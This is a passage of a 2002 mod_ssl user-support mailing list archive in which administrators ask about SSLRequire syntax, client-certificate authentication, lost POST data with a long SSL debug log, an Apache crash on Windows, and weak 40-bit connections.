piffio.homelinux.org (8.11.6/8.11.6) id g1IHkHI22430 for modssl-users@modssl.org; Mon, 18 Feb 2002 18:46:17 +0100 Date: Mon, 18 Feb 2002 18:46:16 +0100 From: Sergio Visinoni To: modssl-users@modssl.org Subject: SSLRequire and file function Message-ID: <20020218184616.A21784@piffio.homelinux.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="AhhlLboLdkugWU4S" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i X-Operating-System: Linux piffio.homelinux.org 2.4.17-0.1custom Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Sergio Visinoni X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --AhhlLboLdkugWU4S Content-Type: text/plain; charset=us-ascii Content-Disposition: inline I need some clarification about the file function. If this file has only one value (without \n at the end) it work correctly, but if I insert more then one value in this file it fails... here my directive: SSLRequire %{SSL_CLIENT_M_SERIAL} in { file("/etc/httpd/conf/certificate.txt") } If the file /etc/httpd/conf/certificate.txt contains only: 01 (or any other valid value) all is ok, but if I want to use more then one it don't work correctly. Anyone knows the correct syntax for this file? TIA sergio --AhhlLboLdkugWU4S Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Per informazioni si veda http://www.gnupg.org iD8DBQE8cT3nVtOU/CTVC8QRAmUuAJ9obrZJswG5eb3OyHm1j2JvCxKBogCghQlH R8CnRCL6L7VUReQj2+LV6PQ= =WYdh -----END PGP SIGNATURE----- --AhhlLboLdkugWU4S-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 22 15:13:54 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA28626; Fri, 22 Feb 2002 15:07:35 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id PAA28102; Fri, 22 Feb 2002 15:01:39 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 1AF084CE776; Fri, 22 Feb 2002 15:01:34 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1MD8p932224; Fri, 22 Feb 2002 14:08:51 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from fort-point-station.mit.edu id UAA21128; Wed, 20 Feb 2002 20:48:10 +0100 (MET) Received: from central-city-carrier-station.mit.edu (CENTRAL-CITY-CARRIER-STATION.MIT.EDU [18.7.7.72]) by fort-point-station.mit.edu (8.9.2/8.9.2) with ESMTP id OAA28305 for ; Wed, 20 Feb 2002 14:48:08 -0500 (EST) Received: from melbourne-city-street.mit.edu (MELBOURNE-CITY-STREET.MIT.EDU [18.7.21.86]) by central-city-carrier-station.mit.edu (8.9.2/8.9.2) with ESMTP id OAA14137 for ; Wed, 20 Feb 2002 14:48:08 -0500 (EST) Received: from calloway.mit.edu (CALLOWAY.MIT.EDU [18.55.1.20]) by melbourne-city-street.mit.edu (8.9.2/8.9.2) with ESMTP id OAA28732 for ; Wed, 20 Feb 2002 14:48:07 -0500 (EST) Received: (from belg4mit@localhost) by calloway.mit.edu (8.9.3) id OAA20390; Wed, 20 Feb 2002 14:48:07 -0500 Message-Id: <200202201948.OAA20390@calloway.mit.edu> To: modssl-users@modssl.org Subject: Client Certification w/ FakeBasicAuth X-Organization: a) Discordia b) none c) what's that? X-Content-Typo: gibberish, charset=ascii-art Date: Wed, 20 Feb 2002 14:48:07 -0500 From: Jerrad Pierce Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Jerrad Pierce X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users In this thread: http://marc.theaimsgroup.com/?l=apache-modssl&m=94967065100671&w=2 It says to allow either client cert or basic auth is not feasible, but it was 2 years ago, is this still the case? The author of the originating message says he got it working but there were some holes, in my case I am prompted for a password even with a client cert. Also under the assumption that to allow either or I'd need to use SSLVerifyClient optional. If it is still an issue, is there some other way to allow either form of authentication? I know I could setup 2 locations, but I'd like the authentication to be transaprent ie; one URL for all. PS> Please (b)cc me as this address is not subscribed -- H4sICNoBwDoAA3NpZwA9jbsNwDAIRHumuC4NklvXTOD0KSJEnwU8fHz4Q8M9i3sGzkS7BBrm OkCTwsycb4S3DloZuMIYeXpLFqw5LaMhXC2ymhreVXNWMw9YGuAYdfmAbwomoPSyFJuFn2x8 Opr8bBBidccAAAA= -- MOTD on Sweetmorn, the 51st of Chaos, in the YOLD 3168: "Dear Lord, give me chastity and self-restraint... but not yet, O Lord, not yet!" -Saint Auguistine A.D. 354-430 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 22 15:14:42 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA28874; Fri, 22 Feb 2002 15:10:40 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id PAA28103; Fri, 22 Feb 2002 15:01:39 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 0A9CB4CE774; Fri, 22 Feb 2002 15:01:34 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1MD8fw32218; Fri, 22 Feb 2002 14:08:41 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from communicate.01com.com id TAA10898; Wed, 20 Feb 2002 19:02:24 +0100 (MET) Received: from 01com.com (DEV_MARIAN_P298 [10.0.0.32]) by communicate.01com.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id F25WS96G; Wed, 20 Feb 2002 12:59:40 -0500 Message-ID: <3C73E4B3.7090306@01com.com> Date: Wed, 20 Feb 2002 13:02:27 -0500 From: Marian User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:0.9.4) Gecko/20011128 Netscape6/6.2.1 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: POST request data does not get through with Netscape 4.61 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Marian X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi! I have the following problem: I am running Apache 1.3.22 with mod_ssl 2.8.5 and openssl 0.9.6b on a Windows 98 platform. I have a simple page on the server wich looks as follows: file : test.php ================================================= Sample of HTML Form Submission Hi .

Your name:

================================================= When I am trying to submit this page using Netscape 4.61 the POST data seems to get lost. I tried to create a log with the data that is passed through mod_ssl, but unfortunately the data is encripted and I do not know if the POST data is acctually received. The SSL log looks as follows: [20/Feb/2002 12:12:42 -267647] [info] Init: Loading certificate & private key of SSL-aware server localhost:443 [20/Feb/2002 12:12:42 -267647] [trace] Init: (localhost:443) unencrypted RSA private key - pass phrase not required [20/Feb/2002 12:12:43 -267647] [info] Init: Configuring server localhost:443 for SSL protocol [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Creating new SSL context (protocols: SSLv2, SSLv3, TLSv1) [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Configuring permitted SSL ciphers [ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL] [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Configuring RSA server certificate [20/Feb/2002 12:12:43 -267647] [warn] Init: (localhost:443) RSA server certificate CommonName (CN) `01com' does NOT match server name!? [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Configuring RSA server private key [20/Feb/2002 12:12:43 -267647] [info] Init: Configuring server localhost:443 for SSL protocol [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Creating new SSL context (protocols: SSLv2, SSLv3, TLSv1) [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Configuring permitted SSL ciphers [ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL] [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Configuring RSA server certificate [20/Feb/2002 12:12:43 -267647] [warn] Init: (localhost:443) RSA server certificate CommonName (CN) `01com' does NOT match server name!? [20/Feb/2002 12:12:43 -267647] [trace] Init: (localhost:443) Configuring RSA server private key [20/Feb/2002 12:12:43 -423811] [info] Init: Loading certificate & private key of SSL-aware server localhost:443 [20/Feb/2002 12:12:43 -423811] [trace] Init: (localhost:443) unencrypted RSA private key - pass phrase not required [20/Feb/2002 12:12:44 -423811] [info] Init: Configuring server localhost:443 for SSL protocol [20/Feb/2002 12:12:44 -423811] [trace] Init: (localhost:443) Creating new SSL context (protocols: SSLv2, SSLv3, TLSv1) [20/Feb/2002 12:12:44 -423811] [trace] Init: (localhost:443) Configuring permitted SSL ciphers [ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL] [20/Feb/2002 12:12:44 -423811] [trace] Init: (localhost:443) Configuring RSA server certificate [20/Feb/2002 12:12:44 -423811] [warn] Init: (localhost:443) RSA server certificate CommonName (CN) `01com' does NOT match server name!? [20/Feb/2002 12:12:44 -423811] [trace] Init: (localhost:443) Configuring RSA server private key [20/Feb/2002 12:13:18 -423811] [info] Connection to child 0 established (server localhost:443, client 127.0.0.1) [20/Feb/2002 12:13:18 -423811] [info] Seeding PRNG with 0 bytes of entropy [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Handshake: start [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: before/accept initialization [20/Feb/2002 12:13:18 -423811] [debug] OpenSSL: read 11/11 bytes from BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 80 2b 01 03 00 00 12 00-00 00 10 .+......... | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:18 -423811] [debug] OpenSSL: read 34/34 bytes from BIO#007ACFB0 [mem: 053A16D3] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 02 00 80 04 00 80 00 00-64 00 00 62 00 00 03 00 ........d..b.... | | 0010: 00 06 ae ee 23 68 16 7b-1d 53 86 a4 4c 1c da 37 ....#h.{.S..L..7 | | 0020: 14 60 .` | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: SSLv3 read client hello A [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: SSLv3 write server hello A [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: SSLv3 write certificate A [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: SSLv3 write server done A [20/Feb/2002 12:13:18 -423811] [debug] OpenSSL: write 633/633 bytes to BIO#007ACFB0 [mem: 053AE6F0] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 16 03 00 00 2a 02 00 00-26 03 00 3c 73 d9 2e 1e ....*...&..c.d.........0. | | 0220: 06 09 2a 86 48 86 f7 0d-01 01 04 05 00 03 41 00 ..*.H.........A. | | 0230: 1d 92 a7 2f 9e a6 e8 c7-5b 30 59 cf e8 b8 f1 db .../....[0Y..... | | 0240: 49 58 65 2c 09 fa 95 e2-a5 2a 17 e6 8c 72 fd b5 IXe,.....*...r.. | | 0250: 03 06 55 ee 99 be 66 be-cc 1d 56 a0 69 a7 6a 3d ..U...f...V.i.j= | | 0260: 87 95 2d 97 9e cc 37 91-f1 43 c1 dc 19 d2 b6 83 ..-...7..C...... | | 0270: 16 03 00 00 04 0e ...... | | 0279 - +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:18 -423811] [trace] OpenSSL: Loop: SSLv3 flush data [20/Feb/2002 12:13:18 -423811] [debug] OpenSSL: read 5/5 bytes from BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 16 03 00 00 44 ....D | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:18 -423811] [debug] OpenSSL: read 68/68 bytes from BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 10 00 00 40 7c d0 4b 7f-c7 3a 70 b6 ed f3 55 9b ...@|.K..:p...U. | | 0010: 8a 51 71 cd 43 b8 42 44-0c 96 7d 3a 67 69 34 b5 .Qq.C.BD..}:gi4. | | 0020: 01 b9 d4 3a 66 d6 d5 2e-b2 99 f0 8f 27 16 9e 03 ...:f.......'... | | 0030: fa 5e 49 60 37 d2 91 f8-d9 33 f5 3b b5 6f ec 03 .^I`7....3.;.o.. | | 0040: e2 6d 7a 13 .mz. | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Loop: SSLv3 read client key exchange A [20/Feb/2002 12:13:19 -423811] [debug] OpenSSL: read 5/5 bytes from BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 14 03 00 00 01 ..... | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:19 -423811] [debug] OpenSSL: read 1/1 bytes from BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 01 . | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:19 -423811] [debug] OpenSSL: read 5/5 bytes from BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 16 03 00 00 38 ....8 | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:19 -423811] [debug] OpenSSL: read 56/56 bytes from BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 51 62 5a b2 4a 9d a5 9c-de ea ca 38 08 f3 27 e0 QbZ.J......8..'. | | 0010: 5e 44 5e c0 cd 95 98 91-8d e3 64 07 6b 26 06 98 ^D^.......d.k&.. | | 0020: e5 f6 f9 d9 56 80 62 fc-73 db d9 2c 48 dd 3e 79 ....V.b.s..,H.>y | | 0030: 5f 84 12 f4 e8 33 0e c3- _....3.. | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Loop: SSLv3 read finished A [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Loop: SSLv3 write change cipher spec A [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Loop: SSLv3 write finished A [20/Feb/2002 12:13:19 -423811] [debug] OpenSSL: write 67/67 bytes to BIO#007ACFB0 [mem: 053AE6F0] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 14 03 00 00 01 01 16 03-00 00 38 5c 40 23 59 8f ..........8\@#Y. | | 0010: a9 80 5f af d7 d6 cd f3-f3 8e c7 a9 71 55 06 25 .._.........qU.% | | 0020: aa 54 9b 88 08 71 6e 48-c8 3b 4b b5 c1 ac ec 95 .T...qnH.;K..... | | 0030: c4 a8 93 a2 73 d6 88 ec-71 39 ea 71 f6 fe 81 10 ....s...q9.q.... | | 0040: 68 04 2c h., | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Loop: SSLv3 flush data [20/Feb/2002 12:13:19 -423811] [trace] OpenSSL: Handshake: done [20/Feb/2002 12:13:19 -423811] [info] Connection: Client IP: 127.0.0.1, Protocol: SSLv3, Cipher: EXP-RC4-MD5 (40/128 bits) [20/Feb/2002 12:13:20 -423811] [debug] OpenSSL: read 5/5 bytes from BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 17 03 00 01 72 ....r | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:20 -423811] [debug] OpenSSL: read 370/370 bytes from BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: a8 d1 97 12 b3 38 e5 74-d4 81 47 ad e6 20 d2 83 .....8.t..G.. .. | | 0010: 68 5a af f4 79 38 c3 c4-fa 53 a1 26 95 87 31 c9 hZ..y8...S.&..1. | | 0020: a4 b8 5d d8 c3 d9 f0 94-f1 d4 95 0a b6 fd a6 99 ..]............. | | 0030: a2 2b b8 9b f4 d1 a8 6e-ad ea 57 61 b6 82 14 ae .+.....n..Wa.... | | 0040: 82 52 e8 b2 95 31 6c 82-48 ca 87 7b e4 a2 52 61 .R...1l.H..{..Ra | | 0050: 9b 0c 8c 40 41 1f a8 01-a7 b1 6c 43 ce e3 37 fa ...@A.....lC..7. | | 0060: 34 34 f4 3f d8 bb 82 d8-5b 35 0e 21 eb 6b 7e 7c 44.?....[5.!.k~| | | 0070: a6 5d 1b 2c 7f 87 61 e0-ee aa 34 c6 02 52 c1 df .].,..a...4..R.. | | 0080: b1 ea 01 a0 f4 9c 43 4b-86 84 5b df d5 e7 78 ca ......CK..[...x. | | 0090: 5a 4e b4 a8 75 29 89 0a-e2 9b 9a bd 14 97 5c e0 ZN..u)........\. | | 00a0: 8c 18 d8 e7 fc 3b a0 9d-1c c8 4c 64 67 92 64 92 .....;....Ldg.d. | | 00b0: 56 b3 32 00 56 a9 62 e3-75 ec 3c 2d 19 f6 c0 11 V.2.V.b.u.<-.... | | 00c0: df 7a 00 42 63 d7 15 ac-17 c3 e4 7c 0c 3b 9b ed .z.Bc......|.;.. | | 00d0: 75 9d 18 ec c3 ce d1 7f-30 1c c9 f6 4f 16 77 8a u.......0...O.w. | | 00e0: 0f e1 18 fc 89 f7 d5 31-cf f9 bf 6d c1 25 5c 08 .......1...m.%\. | | 00f0: 10 32 44 30 24 b6 60 d6-e3 d7 56 81 4c af 65 c1 .2D0$.`...V.L.e. | | 0100: 61 60 12 08 17 d0 3e 6f-ee bb a6 05 10 68 f4 bb a`....>o.....h.. | | 0110: c6 f2 e2 ef 48 8f ae 13-0a fb 33 67 20 b1 2a 71 ....H.....3g .*q | | 0120: 2d 83 80 31 6b 8e 72 58-fc 97 ed 10 ce 13 ab 22 -..1k.rX......." | | 0130: f1 78 d0 27 9c b7 2d cd-80 e3 bd 66 f4 6a 02 98 .x.'..-....f.j.. | | 0140: cf 1d c9 20 34 41 8c 28-d1 0e 8a e5 9f 70 06 7d ... 4A.(.....p.} | | 0150: e4 1e 59 94 76 d0 02 97-4a 84 fc 89 17 3a a2 d7 ..Y.v...J....:.. | | 0160: 4a 42 b1 2a ba 5c b7 cc-fa f2 ce 1d 56 60 7e 08 JB.*.\......V`~. | | 0170: 7a b3 z. | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:27 -423811] [debug] OpenSSL: read 5/5 bytes from BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 17 03 00 00 55 ....U | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:27 -423811] [debug] OpenSSL: read 85/85 bytes from BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 38 8a 8b 75 1c b1 c4 cc-0b 19 1c df 8d 79 f7 6f 8..u.........y.o | | 0010: e8 2e ad e0 8b fd 14 65-ab 42 78 1a 9a 2b 70 13 .......e.Bx..+p. | | 0020: df 74 a2 71 b2 37 dc d7-1c 57 f1 57 33 e7 8f 34 .t.q.7...W.W3..4 | | 0030: 42 cd 18 80 7a 2c 49 ef-b1 90 6c 38 0d 2f 19 bf B...z,I...l8./.. | | 0040: ac a2 dd b3 ff ec e1 7e-47 b1 cb 88 62 f6 68 0d .......~G...b.h. | | 0050: dc 6c 29 30 92 .l)0. | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:28 -423811] [debug] OpenSSL: read 5/5 bytes from BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 17 03 00 00 11 ..... | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:28 -423811] [debug] OpenSSL: read 17/17 bytes from BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 6c 75 f0 9d b0 7e c6 da-9f 1c bb 8d 34 bc 48 35 lu...~......4.H5 | | 0010: 85 . | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:28 -423811] [debug] OpenSSL: read 5/5 bytes from BIO#007ACFB0 [mem: 053A16C8] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 17 03 00 00 11 ..... | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:28 -423811] [debug] OpenSSL: read 17/17 bytes from BIO#007ACFB0 [mem: 053A16CD] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: db 8a c4 47 00 ae 72 5d-6a f9 86 f8 c4 4d b9 ee ...G..r]j....M.. | | 0010: 8b . | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:28 -423811] [info] Initial (No.1) HTTPS request received for child 0 (server localhost:443) [20/Feb/2002 12:13:29 -423811] [debug] OpenSSL: write 605/605 bytes to BIO#007ACFB0 [mem: 053A9EDC] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 17 03 00 02 58 a2 eb 8c-27 78 2c 7b 2f 60 30 86 ....X...'x,{/`0. | | 0010: 97 6e a9 7c 99 d8 2a 07-0e 74 f8 c2 d6 75 bb d5 .n.|..*..t...u.. | | 0020: 27 7e d2 f0 ea 2e b2 db-05 54 bf 9f 7c 50 e8 7b '~.......T..|P.{ | | 0030: 0e cd b1 e3 72 e0 ff cc-ef 2a 00 66 41 61 1e ec ....r....*.fAa.. | | 0040: f8 ed c3 be 75 03 29 62-b3 c3 a2 8b 5e 75 06 62 ....u.)b....^u.b | | 0050: 42 9d 17 42 ca 42 3a e7-dd d2 18 c4 5b f6 bd 53 B..B.B:.....[..S | | 0060: 54 85 10 68 66 0a 96 9b-30 9a d2 8d c9 09 de 43 T..hf...0......C | | 0070: bf 68 20 a1 91 1c 90 97-34 83 1f aa e9 6a 14 da .h .....4....j.. | | 0080: d1 11 5d 97 42 a8 12 14-e4 3b df 63 74 d4 a3 52 ..].B....;.ct..R | | 0090: 09 e8 fe a0 ef 9a fb fc-f0 26 fd cc 4e a0 3c 4c .........&..N..... | | 01f0: f1 07 95 0b cb cb bd 41-40 60 14 24 06 1a 50 43 .......A@`.$..PC | | 0200: ee 8f ca 00 e0 5a a1 54-e3 3b 84 6f 0b 6a 58 2c .....Z.T.;.o.jX, | | 0210: 6f 1d 3d 6b 2b 4c 8d c8-bb 05 82 d3 bd f7 8c 92 o.=k+L.......... | | 0220: a8 6a 61 56 ce 66 37 ff-c8 2f 94 ef c2 2a 3a ff .jaV.f7../...*:. | | 0230: 4f 82 0f 61 ed 50 d0 9e-6e cb e1 68 92 64 f3 43 O..a.P..n..h.d.C | | 0240: 2f a0 a1 18 08 6b ad cd-b5 27 f6 a1 13 e2 dc c0 /....k...'...... | | 0250: c2 cb 02 ae a6 37 d3 5d-e6 a8 f1 38 87 .....7.]...8. | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:29 -423811] [debug] OpenSSL: write 23/23 bytes to BIO#007ACFB0 [mem: 053A9EDC] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 15 03 00 00 12 0a fc da-5b 1a 33 bc 0f cb cf df ........[.3..... | | 0010: 11 2a 0f 7a 1a 11 1f .*.z... | +-------------------------------------------------------------------------+ [20/Feb/2002 12:13:30 -423811] [trace] OpenSSL: Write: SSL negotiation finished successfully [20/Feb/2002 12:13:30 -423811] [info] Connection to child 0 closed with standard shutdown (server localhost:443, client 127.0.0.1) I searched the news groups but I did not find anything relevat to this problem. There is a problem with Nescape and renegotiation, but I do not think that this is my problem. Please let me know if there is any fix to this kind of problem. Thank you, Marian ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 22 15:25:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA00764; Fri, 22 Feb 2002 15:25:04 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from morzine.ciger.be id PAA00533; Fri, 22 Feb 2002 15:23:49 +0100 (MET) Received: from meribel.cigersoft.be (meribel.cigersoft.be [172.24.2.233]) by morzine.ciger.be (8.12.2/8.12.2) with ESMTP id g1MENeU6055422 for ; Fri, 22 Feb 2002 15:23:41 +0100 (CET) content-class: urn:content-classes:message Date: Fri, 22 Feb 2002 15:23:34 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Message-ID: <43101D2B73D34E449831D5F1BC57F2C322B147@meribel.cigersoft.be> X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3 Thread-Index: AcG7rF+iN2/aEre+R0iCUmbXjL4NYg== From: "Henri Hennebert" To: X-Virus-Scanned: by AMaViS-perl11-milter (http://amavis.org/) Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA00639 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Henri Hennebert" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello everyone, Context: Apache/2.0.32 (Win32) mod_ssl/3.0a0 OpenSSL/0.9.6c on WinXP-Pro I try to run mod_ssl with: SSLVerifyClient require SSLVerifyDepth 1 The first time I visite the web site, I'm prompted by my IE (version 6.0.2600.0000.xpclient.010817-1148) to send back my cert. At the same time, one of the apache process has an access violation (trapped by the VC++ debugger with which I compile and install Apache in the first place). If I accept to send the cert quickly, I get the requested html page! Just next, the second apache process stop with another access violation. When prompted , I start the debugger. The error is in ssl_engine_io.c, fuction: #define BIO_bucket_ptr(bio) (BIO_bucket_t *)bio->ptr static int BIO_bucket_flush(BIO *bio) { BIO_bucket_t *b = BIO_bucket_ptr(bio); ==> if (!(b->blen || b->length)) { return APR_SUCCESS; } --- clip --- Bio->ptr has a wrong value. P.S. If I restart a fresh copy of apache and continue my browsing using the running copy of IE, all proceed normally. If I run /cgi-bin/printenv I get the information of my personnal certificate in the environment. If I stop IE and restart it, I'm back with the access violation error. Henri ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 22 15:32:35 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA01615; Fri, 22 Feb 2002 15:30:51 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web10008.mail.yahoo.com id PAA01455; Fri, 22 Feb 2002 15:29:27 +0100 (MET) Message-ID: <20020221194244.56763.qmail@web10008.mail.yahoo.com> Received: from [200.73.60.246] by web10008.mail.yahoo.com via HTTP; Thu, 21 Feb 2002 11:42:44 PST Date: Thu, 21 Feb 2002 11:42:44 -0800 (PST) From: Pablo Silva Subject: Global ID for IE 5.0 NN 4.5 on Win98 dosen't works To: modssl-users@modssl.org In-Reply-To: <200202210335.EAA09746@opensource.ee.ethz.ch> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Pablo Silva X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi All! I've tested a web site connection www.magnetenterprises.com with Netscape Navigator version 4.5 and IE 5.0 on win98, both browsers show me 128 bits connection without erros. I have a doubt with my certificate, I made a GLOBAL_ID certificate for my web site, but ... , when I test with Netscape Navigator 4.5 and IE 5.0 both on windows 98, only connect by 40 bits :-( My web site is on Apache + Linux Suse 7.1 Professional when I connect by Netscape Navigator version 4.75 on Linux, I can see a 128 bits .., but when I test with NN or IE on win98 only I can get 40 bits conecctions.. I don't know what happens, is necesary configurate some directive for to obligate a 128 bits conecctions for both browsers NN and IE in Apache? How I must to do it? Thanks in advance Greetings from Chile. -Pablo __________________________________________________ Do You Yahoo!? Yahoo! Sports - Coverage of the 2002 Olympic Games http://sports.yahoo.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 22 15:39:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA02087; Fri, 22 Feb 2002 15:37:35 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ajax.cnchost.com id PAA02015; Fri, 22 Feb 2002 15:36:22 +0100 (MET) Received: from WGUARALDI2 ([4.17.140.34]) by ajax.cnchost.com id JAA18556; Fri, 22 Feb 2002 09:36:08 -0500 (EST) [ConcentricHost SMTP Relay 1.14] From: "Will Guaraldi" To: Subject: RE: How to install mod_ssl + mod_webapp? Date: Fri, 22 Feb 2002 09:36:09 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal In-Reply-To: <20020222082047.A132390@structure> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Will Guaraldi" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users For the record, we're running Apache 1.3.20/mod_ssl 2.8.4 with ApacheJServer 1.1.2 and we get the same warning when 